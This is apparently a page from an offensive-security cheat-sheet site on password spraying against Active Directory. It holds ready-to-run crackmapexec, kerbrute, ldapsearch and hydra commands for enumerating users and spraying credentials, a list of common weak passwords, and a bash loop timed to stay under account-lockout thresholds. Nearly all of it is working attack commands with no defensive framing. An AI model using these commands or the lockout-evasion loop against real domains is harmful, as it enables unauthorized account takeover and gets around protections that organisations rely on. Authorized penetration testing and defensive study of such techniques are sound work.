Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Try one password against many users. Avoids account lockout (usually 3-5 attempts). Check lockout policy first.
Check Lockout Policy
crackmapexec smb DC_IP -u user -p password --pass-pol
net accounts /domain
Get-ADDefaultDomainPasswordPolicy
Get User List
# Enum via RPC
crackmapexec smb DC_IP -u user -p password --users
# Enum via LDAP
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "[email protected]" -w 'pass' "(objectClass=user)" sAMAccountName | grep sAMAccountName
# Kerbrute user enum (no creds needed)
kerbrute userenum -d domain.local --dc DC_IP users.txt
Kerbrute
kerbrute passwordspray -d domain.local --dc DC_IP users.txt 'Password123!'
CrackMapExec
SMB
crackmapexec smb DC_IP -u users.txt -p 'Password123!' --continue-on-success
LDAP
crackmapexec ldap DC_IP -u users.txt -p 'Password123!'
Multiple Passwords (Careful — Lockout)
crackmapexec smb DC_IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
--no-bruteforce = try user1:pass1, user2:pass2 (not all combos).
Spray with Hydra
hydra -L users.txt -p 'Password123!' smb://DC_IP
hydra -L users.txt -p 'Password123!' ldap3://DC_IP
Common Passwords to Try
Password1
Password123
Password123!
Welcome1
Welcome123
Company2024
Season+Year (Summer2024, Winter2024)
MonthYear (January2024)
Spray Script (Rate Limited)
for pass in 'Spring2024!' 'Password123!' 'Welcome1'; do
echo "[*] Trying: $pass"
crackmapexec smb DC_IP -u users.txt -p "$pass" --continue-on-success
echo "[*] Sleeping 30 minutes..."
sleep 1800
done
Quick Reference
| Task | Command |
|---|
| Check policy | crackmapexec smb DC -u user -p pass --pass-pol |
| Kerbrute | kerbrute passwordspray -d DOM --dc DC users.txt 'Pass' |
| CME spray | crackmapexec smb DC -u users.txt -p 'Pass' --continue-on-success |
| User enum | kerbrute userenum -d DOM --dc DC users.txt |